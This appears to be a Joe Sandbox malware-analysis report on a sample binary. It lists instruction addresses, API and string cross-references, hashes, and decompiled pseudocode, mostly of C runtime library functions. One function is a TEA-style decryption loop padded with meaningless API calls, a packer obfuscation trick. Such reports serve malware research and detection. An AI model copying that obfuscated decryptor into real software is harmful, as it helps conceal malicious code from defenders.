0x00423c0c
0x00423c22
0x00423c27
0x00423c27
0x00423c0c
0x00423c2e
0x00423ce8
0x00423cfb
0x00423d00
0x00000000
0x00423c34
0x00423c34
0x00423c38
0x00000000
0x00000000
0x00423c3e
0x00423c41
0x00423c4a
0x00423c50
0x00423c50
0x00423c5f
0x00423c67
0x00000000
0x00000000
0x00423c69
0x00423c6c
0x00423c91
0x00423c96
0x00423c99
0x00423ca6
0x00423cb4
0x00423cc7
0x00423ccc
0x00423cdb
0x00000000
0x00423cdb
0x00423ca8
0x00423ca8
0x00000000
0x00423ca8
0x00423ce6
0x00423d03
0x00423d0a
0x00423d12
0x00423d28
0x00423d2d
0x00423d2d
0x00423d12
0x00423d0a
0x00423d30
0x00423d34
0x00423d3c
0x00423d41
0x00423d44
0x00423d44
0x00423d4b
0x00423d4b
0x00422ecb
0x00422ed2
0x00422edf
0x00422ee4
0x00000000
0x00422ef7
0x00422f01
0x00422f28
0x00422f0f
0x00422f20
0x00422f20
0x00422f01
0x00422f32
0x00422f38
0x00422f44
0x00422f47
0x00422f55
0x00422f58
0x00422f65
0x0042300a
0x00423010
0x0042301d
0x00000000
0x00000000
0x00423023
0x00423029
0x00000000
0x00423030
0x00423030
0x0042304a
0x0042304f
0x00000000
0x00000000
0x00423057
0x00423057
0x0042305e
0x00423061
0x00423064
0x00423067
0x0042306a
0x0042306d
0x00423070
0x00423077
0x0042307e
0x00000000
0x00000000
0x0042308a
0x0042308a
0x00423091
0x0042309d
0x004230a0
0x004230a6
0x004230ad
0x00000000
0x00000000
0x004230af
0x004230b5
0x004230b5
0x004230bc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423100
0x00423100
0x00423107
0x0042310a
0x00423134
0x00423137
0x00423137
0x00423141
0x00423141
0x00423145
0x0042310c
0x0042310c
0x00423118
0x0042311b
0x0042311f
0x00423121
0x00423124
0x00423124
0x00423127
0x0042312a
0x0042312d
0x0042312f
0x0042312f
0x00423132
0x00423148
0x00000000
0x00000000
0x0042314d
0x0042314d
0x00000000
0x00000000
0x00423159
0x00423159
0x00423160
0x00423163
0x00423183
0x00423186
0x00423186
0x00423190
0x00423190
0x00423194
0x00423165
0x00423165
0x00423171
0x00423174
0x00423178
0x0042317a
0x0042317a
0x00423181
0x00000000
0x00000000
0x0042319c
0x0042319c
0x004231a3
0x004231af
0x004231b2
0x004231b8
0x004231bf
0x004232d2
0x00000000
0x004232d2
0x004231c5
0x004231cb
0x004231cb
0x004231d2
0x00000000
0x00423209
0x00423209
0x0042320c
0x0042320f
0x00423212
0x00423239
0x00423239
0x0042323c
0x0042323f
0x00423242
0x00423266
0x00423266
0x00423269
0x0042326c
0x0042326f
0x004232a8
0x004232b9
0x00000000
0x004232b9
0x00423271
0x00423271
0x00423274
0x00423277
0x0042327a
0x00000000
0x00000000
0x0042327c
0x0042327c
0x0042327f
0x00423282
0x00423285
0x00000000
0x00000000
0x00423287
0x00423287
0x0042328a
0x0042328d
0x00423290
0x00000000
0x00000000
0x00423292
0x00423292
0x00423295
0x00423298
0x0042329b
0x00000000
0x00000000
0x0042329d
0x0042329d
0x004232a0
0x004232a3
0x004232a6
0x004232aa
0x00000000
0x004232aa
0x00000000
0x004232a6
0x00423244
0x00423244
0x00423247
0x0042324b
0x0042324e
0x00000000
0x00423250
0x00423253
0x00423256
0x0042325c
0x00423261
0x00000000
0x00423261
0x0042324e
0x00423214
0x00423214
0x00423217
0x0042321b
0x0042321e
0x00000000
0x00423220
0x00423223
0x00423226
0x0042322c
0x00423231
0x00000000
0x00423231
0x00000000
0x004232bb
0x004232bb
0x004232be
0x004232c1
0x00000000
0x00000000
0x004231d9
0x004231d9
0x004231dc
0x004231df
0x004231e2
0x004231fb
0x004231fe
0x004231fe
0x00423201
0x004231e4
0x004231e4
0x004231e7
0x004231ea
0x004231f0
0x004231f6
0x004231f6
0x00000000
0x00000000
0x004232c6
0x004232c6
0x004232c9
0x004232c9
0x004232cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004232d7
0x004232d7
0x004232de
0x004232e4
0x004232ea
0x004232ed
0x004232f3
0x004232fa
0x00000000
0x00423b50
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b07
0x00423b0d
0x00423b10
0x00423b13
0x00423b16
0x00423b19
0x00423b1f
0x00423b1f
0x00423b1f
0x00423b27
0x00423b2b
0x00000000
0x00000000
0x00423b2d
0x00423b2d
0x00423b30
0x00423b33
0x00423b33
0x00423b38
0x00423b3b
0x00423b3e
0x00423b41
0x00423b44
0x00423b47
0x00423b4a
0x00423b4a
0x00423b4d
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x00423300
0x00423306
0x00423306
0x0042330d
0x00000000
0x00423691
0x00423691
0x0042369f
0x0042369f
0x004236a2
0x00000000
0x00000000
0x00423314
0x00423317
0x00423317
0x0042331d
0x0042331f
0x00423322
0x00423322
0x00423325
0x00423325
0x00000000
0x00000000
0x0042345a
0x0042345d
0x0042345d
0x00423462
0x00423464
0x00423467
0x00423467
0x0042346a
0x0042346a
0x00000000
0x00000000
0x0042385d
0x0042385d
0x00000000
0x00000000
0x00000000
0x00000000
0x004236a9
0x004236ac
0x004236af
0x004236b2
0x004236b8
0x004236bb
0x004236c2
0x004236c6
0x004236d1
0x004236d1
0x004236d5
0x004236ec
0x004236ec
0x004236f3
0x004236f5
0x004236f5
0x004236fc
0x004236fc
0x00423703
0x00423711
0x00423714
0x00423723
0x00423726
0x0042372a
0x0042373f
0x0042372c
0x0042372c
0x0042372f
0x00423735
0x0042373a
0x0042373a
0x0042372a
0x00423749
0x0042374c
0x0042374f
0x00423752
0x00423755
0x00423758
0x0042375e
0x00423764
0x0042376c
0x0042376d
0x00423770
0x00423771
0x00423774
0x00423775
0x0042377c
0x0042377d
0x00423780
0x00423781
0x00423784
0x00423785
0x0042378b
0x0042378c
0x0042379b
0x0042379d
0x004237a3
0x004237a3
0x004237a8
0x004237aa
0x004237ae
0x004237b0
0x004237b8
0x004237b9
0x004237bc
0x004237bd
0x004237cc
0x004237ce
0x004237ce
0x004237ae
0x004237d1
0x004237d8
0x004237db
0x004237e0
0x004237e0
0x004237e6
0x004237e8
0x004237f0
0x004237f1
0x004237f4
0x004237f5
0x00423803
0x00423805
0x00423805
0x004237e6
0x00423808
0x0042380b
0x0042380e
0x00423811
0x00423816
0x0042381b
0x0042381e
0x00423821
0x00423821
0x00423824
0x00423824
0x00423827
0x00423833
0x00000000
0x00423833
0x004236d7
0x004236d7
0x004236de
0x004236e1
0x00000000
0x00000000
0x004236e3
0x004236e3
0x00000000
0x004236e3
0x004236c8
0x004236c8
0x00000000
0x00000000
0x00423328
0x00423328
0x00423333
0x0042333b
0x00423342
0x00423345
0x00423345
0x00423348
0x004233a8
0x0042334a
0x00423351
0x00423357
0x0042335d
0x00423364
0x00423367
0x0042336d
0x00423375
0x00423377
0x0042337e
0x00423385
0x0042338c
0x00423394
0x00423396
0x00423398
0x00423398
0x0042339f
0x004233af
0x004233b5
0x004233b8
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x00000000
0x0042383b
0x0042383e
0x00423841
0x00423844
0x00000000
0x00000000
0x0042359a
0x0042359a
0x004235a6
0x004235ac
0x004235b1
0x004235b3
0x0042365d
0x0042365d
0x00423660
0x00423660
0x00423663
0x00423677
0x0042367d
0x00423683
0x00423665
0x00423665
0x0042366b
0x00423672
0x00423672
0x00423685
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x004235b9
0x004235b9
0x004235b9
0x004235bb
0x004235c9
0x004235bd
0x004235bd
0x004235bd
0x004235d3
0x004235d9
0x004235df
0x004235e6
0x004235e8
0x004235ed
0x004235ef
0x004235f4
0x004235f9
0x004235fb
0x00423600
0x00423603
0x00423606
0x00423608
0x00423608
0x00423606
0x00423609
0x00423610
0x00423658
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423612
0x00423612
0x00423617
0x00423633
0x0042363b
0x00423645
0x00423648
0x0042364d
0x00000000
0x0042364d
0x00000000
0x004238a4
0x004238a4
0x004238ae
0x004238ae
0x004238b4
0x004238b6
0x004238b9
0x004238b9
0x004238bf
0x004238bf
0x00000000
0x00000000
0x00423856
0x00423856
0x00000000
0x00000000
0x0042346d
0x0042346d
0x00423471
0x0042347f
0x00423482
0x00423473
0x00423473
0x00423473
0x00423488
0x0042348e
0x00423494
0x004234a0
0x004234a6
0x004234a6
0x004234a9
0x00423531
0x00423531
0x00423535
0x00423537
0x0042353d
0x0042353d
0x00423540
0x00423547
0x0042354a
0x00423550
0x00423550
0x00423550
0x00423556
0x0042355c
0x0042355f
0x00423565
0x00423567
0x00000000
0x00000000
0x00423569
0x00423569
0x0042356f
0x00423572
0x00423574
0x00000000
0x00000000
0x00423576
0x0042357c
0x0042357f
0x0042357f
0x00423587
0x00423587
0x0042358d
0x0042358d
0x00423592
0x00000000
0x004234af
0x004234af
0x004234af
0x004234b3
0x004234b5
0x004234ba
0x004234ba
0x004234bd
0x004234c0
0x004234c6
0x004234d8
0x004234d8
0x004234d8
0x004234db
0x004234e1
0x00000000
0x00000000
0x004234e3
0x004234e3
0x004234e9
0x004234ec
0x004234ee
0x00000000
0x00000000
0x004234f0
0x004234f0
0x004234f9
0x004234ff
0x00423503
0x0042350b
0x0042350d
0x0042350f
0x00423515
0x00423515
0x00423518
0x00423518
0x00423524
0x00423527
0x004234cf
0x004234d2
0x004234d2
0x004234d5
0x004234d5
0x0042352f
0x00423595
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x00000000
0x0042384d
0x0042384d
0x00000000
0x00000000
0x00423869
0x00423869
0x00423873
0x00423873
0x0042387d
0x0042387d
0x00423883
0x00423885
0x0042388a
0x00423894
0x00423894
0x00423897
0x0042389b
0x0042389b
0x004238c2
0x004238c5
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x0042397e
0x00423982
0x0042398a
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423963
0x00423967
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x0042393d
0x00423949
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423921
0x00423925
0x0042392d
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f4
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238cc
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399b
0x0042399e
0x004239e0
0x004239e0
0x004239e6
0x004239ec
0x004239f2
0x00000000
0x004239a0
0x004239a0
0x004239a0
0x004239a7
0x00000000
0x00000000
0x004239a9
0x004239a9
0x004239b4
0x004239ba
0x004239bc
0x004239c2
0x004239c5
0x004239c7
0x004239cd
0x004239d6
0x004239db
0x004239f8
0x004239fb
0x004239fb
0x00423a00
0x00423a05
0x00423a05
0x00423a0b
0x00423a0d
0x00423a13
0x00423a19
0x00423a19
0x00423a22
0x00423a22
0x00423a0b
0x00423a28
0x00423a2c
0x00423a3a
0x00423a3d
0x00423a40
0x00423a47
0x00423a49
0x00423a49
0x00423a2e
0x00423a2e
0x00423a2e
0x00423a56
0x00423a56
0x00423a5c
0x00423a5e
0x00423a5e
0x00423a65
0x00423a6b
0x00423a6e
0x00423a6e
0x00423a6e
0x00423a74
0x00423a77
0x00423a7a
0x00423a7c
0x00000000
0x00000000
0x00423a7e
0x00423a84
0x00423a84
0x00423a8a
0x00000000
0x00000000
0x00423a8c
0x00423a8c
0x00423a8f
0x00423a92
0x00423a99
0x00423aa0
0x00423aa8
0x00423aae
0x00423ab1
0x00423ab4
0x00423abb
0x00423ac7
0x00423acd
0x00423ad3
0x00423ada
0x00423adc
0x00423ae2
0x00423ae2
0x00423ae8
0x00423ae8
0x00423aee
0x00423af7
0x00423afc
0x00423aff
0x00423a6e
0x00423a6e
0x00423a74
0x00423a77
0x00423a7a
0x00423a7c
0x00000000
0x00000000
0x00000000
0x00423a7c
0x00423a6e
0x004239ab
0x004239ab
0x004239b2
0x00000000
0x00000000
0x00000000
0x004239b2
0x00000000
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x00000000
0x004230d9
0x004230d9
0x004230dc
0x004230df
0x00000000
0x00000000
0x004230e4
0x004230e7
0x004230ed
0x00000000
0x00000000
0x004230ce
0x004230d1
0x004230d4
0x00000000
0x00000000
0x004230c3
0x004230c6
0x004230c9
0x00000000
0x00000000
0x004230f2
0x004230f2
0x004230f5
0x004230f5
0x004230f8
0x00000000
0x00000000
0x004230fb
0x00000000
0x00000000
0x00422f6b
0x00422f6b
0x00422f6d
0x00422f7b
0x00422f6f
0x00422f6f
0x00422f6f
0x00422f8b
0x00422f98
0x00422f9a
0x00422f9f
0x00422fa1
0x00422fa6
0x00422fab
0x00422fad
0x00422fb2
0x00422fb8
0x00422fba
0x00422fba
0x00422fb8
0x00422fbb
0x00422fc2
0x00000000
0x00422fc4
0x00422fc9
0x00422fe5
0x00422fed
0x00422ffa
0x00422fff
0x00423e14
0x00423e21
0x00423e21
0x00422fc2
0x00422f65
0x00423d50
0x00423d57
0x00423d6e
0x00423d6e
0x00423d78
0x00423d78
0x00423d7e
0x00423d8b
0x00423d8d
0x00423d92
0x00423d94
0x00423d99
0x00423d9e
0x00423da0
0x00423da5
0x00423dab
0x00423dad
0x00423dad
0x00423dab
0x00423db5
0x00423e00
0x00423e09
0x00423e0e
0x00423db7
0x00423dbc
0x00423dd8
0x00423de0
0x00423ded
0x00423df2
0x00423df2
0x00000000
0x00423db5
0x00423d59
0x00423d60
0x00000000
0x00000000
0x00423d62
0x00423d62
0x00000000
0x00423d62
0x00423b50
0x004233eb
0x004233eb
0x004233f1
0x004233f8
0x004233fd
0x00423400
0x00000000
0x00423400

APIs

_get_int_arg.LIBCMTD ref: 004233C8
_strlen.LIBCMT ref: 004233F8
_write_multi_char.LIBCMTD ref: 00423BDB
_write_string.LIBCMTD ref: 00423BF6
_write_multi_char.LIBCMTD ref: 00423C22
__mbtowc_l.LIBCMTD ref: 00423C91

Strings

_woutput_s_l, xrefs: 00422FDB
("Incorrect format specifier", 0), xrefs: 00422F9A, 00422FE0
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c, xrefs: 00422FA6, 00422FD6

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
API String ID: 909868375-2264504294
Opcode ID: d99ac7452c3c8c856b0130f7331a8c78442bcfe4f8cc067bbb7b43b728f68c70
Instruction ID: 6b6c483acb8144790f5578c8bf7b539b4c6c3f32348d93924f03cfbe1d572e01
Opcode Fuzzy Hash: d99ac7452c3c8c856b0130f7331a8c78442bcfe4f8cc067bbb7b43b728f68c70
Instruction Fuzzy Hash: E2A18FB1E002289FDB24CF55DD81BAEB7B4BB44305F5081DAE5096B282D77CAE84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409CAC Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123
pipetimeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00409CAC(unsigned int* _a4, unsigned int _a8) {
				long _v8;
				char _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				long _v40;
				char _v1064;
				unsigned int* _t47;
				signed int _t60;
				unsigned int* _t75;
				intOrPtr* _t90;
				signed int _t94;
				unsigned int _t95;

				_t47 = _a4;
				_t90 = _a8;
				_t95 =  *_t47;
				_t94 = _t47[1];
				_v12 = 0xc6ef3720;
				_v28 =  *_t90;
				if( *0x4e3424 == 0x13f7) {
					EnumResourceNamesA(0, 0, 0, 0);
					EnumResourceTypesA(0, 0, 0);
				}
				_v36 =  *((intOrPtr*)(_t90 + 4));
				_v32 =  *((intOrPtr*)(_t90 + 8));
				_v24 =  *((intOrPtr*)(_t90 + 0xc));
				if( *0x4e3424 == 0x60b) {
					FileTimeToLocalFileTime(0, 0);
					GetNamedPipeHandleStateA(0,  &_v40,  &_v8,  &_v16,  &_v20,  &_v1064, 0);
				}
				_v16 = 0x20;
				do {
					_v8 = _t95 << 4;
					E00409C6B( &_v8, _v32);
					_v20 = _v12 + _t95;
					_t60 = (_t95 >> 5) + _v24;
					_a8 = _t60;
					 *0x4c6884 = 0xffcf03fc;
					if( *0x4e3424 == 0x1b) {
						__imp__FindNextVolumeA( &_v1064, 0, 0);
						SetLocaleInfoA(0, 0, "zogujocufulavezevujepotuv");
						OpenMutexW(0, 0, 0);
						_t60 = _a8;
					}
					 *0x4c6884 = 0;
					_a8 = _t60 ^ _v20 ^ _v8;
					 *0x4c6884 =  *0x4c6884 + _a8;
					_t94 = _t94 - _a8;
					 *0x4c688c =  *0x4c688c | 0xffffffff;
					 *0x4c6888 = 0xc5e121b4;
					_a8 = _t94 >> 5;
					_a8 = _a8 + _v36;
					_v8 = (_t94 << 0x00000004) + _v28 ^ _v12 + _t94;
					E00409C4A(_v12 + _t94,  &_v8, _a8);
					_t95 = _t95 - _v8;
					E00408FA3( &_v12, 0x9e3779b9);
					_t43 =  &_v16;
					 *_t43 = _v16 - 1;
				} while ( *_t43 != 0);
				_t75 = _a4;
				_t75[1] = _t94;
				 *_t75 = _t95;
				return _t75;
			}

0x00409cbf
0x00409cc3
0x00409cc7
0x00409cca
0x00409ccf
0x00409cd6
0x00409cd9
0x00409ce1
0x00409cec
0x00409cec
0x00409cf5
0x00409cfb
0x00409d0d
0x00409d10
0x00409d14
0x00409d33
0x00409d33
0x00409d39
0x00409d40
0x00409d48
0x00409d4f
0x00409d59
0x00409d61
0x00409d6b
0x00409d6e
0x00409d78
0x00409d83
0x00409d90
0x00409d99
0x00409d9f
0x00409d9f
0x00409da5
0x00409dae
0x00409db4
0x00409dba
0x00409dbd
0x00409dc9
0x00409dd3
0x00409dd9
0x00409dee
0x00409df5
0x00409dfa
0x00409e06
0x00409e0b
0x00409e0b
0x00409e0b
0x00409e14
0x00409e17
0x00409e1b
0x00409e20

APIs

EnumResourceNamesA.KERNEL32 ref: 00409CE1
EnumResourceTypesA.KERNEL32 ref: 00409CEC
FileTimeToLocalFileTime.KERNEL32(00000000,00000000), ref: 00409D14
GetNamedPipeHandleStateA.KERNEL32 ref: 00409D33
FindNextVolumeA.KERNEL32(?,00000000,00000000), ref: 00409D83
SetLocaleInfoA.KERNEL32(00000000,00000000,zogujocufulavezevujepotuv), ref: 00409D90
OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 00409D99

Strings

, xrefs: 00409D39
zogujocufulavezevujepotuv, xrefs: 00409D89

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: EnumFileResourceTime$FindHandleInfoLocalLocaleMutexNamedNamesNextOpenPipeStateTypesVolume
String ID: $zogujocufulavezevujepotuv
API String ID: 3451815154-3332547936
Opcode ID: a8d848aed5021d63fabc390e7596849f39eba2bab3aaf1da247371ad7f4908c7
Instruction ID: ef81b306fc7b2d9e0e68db09f8b7e979062225be7668e9b22cbb046b2dbcf3ba
Opcode Fuzzy Hash: a8d848aed5021d63fabc390e7596849f39eba2bab3aaf1da247371ad7f4908c7
Instruction Fuzzy Hash: B741D3B6900218EFDB00DFA8DD8499EBBFCEB48355B008466F915EB251D234AA44CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A79F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 63COMMON

Download Yara Rule

APIs

__invalid_parameter.LIBCMTD ref: 0040A7DD
__invalid_parameter.LIBCMTD ref: 0040A82B

Strings

"invalid argument", xrefs: 0040A7D8
("this->_Has_container()", 0), xrefs: 0040A7B1
"out of range", xrefs: 0040A826
("_Myptr + _Off <= ((_Myvec *)(this->_Getmycont()))->_Mylast && _Myptr + _Off >= ((_Myvec *)(this->_Getmycont()))->_Myfirst", 0), xrefs: 0040A7FF
std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::all, xrefs: 0040A7D3, 0040A821
C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector, xrefs: 0040A7AA, 0040A7BE, 0040A7D2, 0040A80C, 0040A820

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __invalid_parameter
String ID: "invalid argument"$"out of range"$("_Myptr + _Off <= ((_Myvec *)(this->_Getmycont()))->_Mylast && _Myptr + _Off >= ((_Myvec *)(this->_Getmycont()))->_Myfirst", 0)$("this->_Has_container()", 0)$C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector$std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::all
API String ID: 3730194576-3093913710
Opcode ID: 4888fb08d5b9a83de543d196da7f52d898a07e811de20dd680eb25ae5e0f6d52
Instruction ID: 7a5d30f58bb165fc4c3243351194cd4cb6bc0ec1920ae140431ef944042868df
Opcode Fuzzy Hash: 4888fb08d5b9a83de543d196da7f52d898a07e811de20dd680eb25ae5e0f6d52
Instruction Fuzzy Hash: 8611E5B17403187BD220A605CCC6F5BB618DB51BA4F24813BF609B72C2E6799D5082FE

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB2E Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 179COMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 0040FBAB
_CheckBytes.LIBCMTD ref: 0040FC49
_CheckBytes.LIBCMTD ref: 0040FCF2

Strings

%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 0040FD91
HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 0040FD1C
HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040FBE0
HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 0040FC7E

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: BytesCheck
String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
API String ID: 1653226792-1867057952
Opcode ID: b0e8663bcf3c86dc5b3b21cd9753cf5a2c2c415ce04929171e8d3c4940af64a7
Instruction ID: 732ebe50595bd109384c4643e9abafe45a8da525be6ab5d2bf21d30f637da2ef
Opcode Fuzzy Hash: b0e8663bcf3c86dc5b3b21cd9753cf5a2c2c415ce04929171e8d3c4940af64a7
Instruction Fuzzy Hash: 0B61F1B4E041059BDB28CB84C895FBFB375AF48704F24817AE5157B7D2D278E846CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041E014 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0041E014(signed int __eax) {
				intOrPtr _t45;
				void* _t50;
				signed int _t54;
				void* _t60;
				signed int _t67;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t94;

				_t85 = _t84 + 0x10;
				 *(_t82 - 0xc) = __eax;
				if( *(_t82 - 0xc) != 0xffffffff) {
					_t71 =  *(_t82 - 0xc) + 1;
					 *(_t82 - 0xc) = _t71;
					__eflags =  *(_t82 + 0xc);
					if( *(_t82 + 0xc) == 0) {
						L27:
						__eflags =  *(_t82 + 8);
						if( *(_t82 + 8) != 0) {
							 *( *(_t82 + 8)) =  *(_t82 - 0xc);
						}
						_t45 =  *((intOrPtr*)(_t82 - 4));
						L30:
						return _t45;
					}
					__eflags =  *(_t82 - 0xc) -  *(_t82 + 0x10);
					if( *(_t82 - 0xc) <=  *(_t82 + 0x10)) {
						L26:
						_t73 =  *(_t82 + 0xc) +  *(_t82 - 0xc);
						__eflags = _t73;
						 *((char*)(_t73 - 1)) = 0;
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t82 + 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t82 + 0x18)) == 0xffffffff) {
						L25:
						 *(_t82 - 0xc) =  *(_t82 + 0x10);
						 *((intOrPtr*)(_t82 - 4)) = 0x50;
						goto L26;
					}
					 *( *(_t82 + 0xc)) = 0;
					__eflags =  *(_t82 + 0x10) - 0xffffffff;
					if( *(_t82 + 0x10) != 0xffffffff) {
						__eflags =  *(_t82 + 0x10) - 0x7fffffff;
						if( *(_t82 + 0x10) != 0x7fffffff) {
							__eflags =  *(_t82 + 0x10) - 1;
							if( *(_t82 + 0x10) > 1) {
								__eflags =  *0x4bb4dc -  *(_t82 + 0x10) - 1; // 0xffffffff
								if(__eflags >= 0) {
									_t67 =  *(_t82 + 0x10) - 1;
									__eflags = _t67;
									 *(_t82 - 0x2c) = _t67;
								} else {
									_t54 =  *0x4bb4dc; // 0xffffffff
									 *(_t82 - 0x2c) = _t54;
								}
								_t71 =  *(_t82 - 0x2c);
								_t52 =  *(_t82 + 0xc) + 1;
								__eflags =  *(_t82 + 0xc) + 1;
								E004116E0(_t80, _t52, 0xfe, _t71);
								_t85 = _t85 + 0xc;
							}
						}
					}
					_t65 =  *(_t82 + 0x10);
					__eflags =  *(_t82 - 0xc) -  *(_t82 + 0x10);
					asm("sbb edx, edx");
					 *(_t82 - 0x18) =  ~_t71;
					if( *(_t82 - 0xc) ==  *(_t82 + 0x10)) {
						_push(L"sizeInBytes > retsize");
						_push(0);
						_push(0x157);
						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\wcstombs.c");
						_push(2);
						_t50 = L0040C820();
						_t85 = _t85 + 0x14;
						__eflags = _t50 - 1;
						if(_t50 == 1) {
							asm("int3");
						}
					}
					__eflags =  *(_t82 - 0x18);
					if( *(_t82 - 0x18) != 0) {
						goto L25;
					} else {
						 *((intOrPtr*)(L00411810(_t65))) = 0x22;
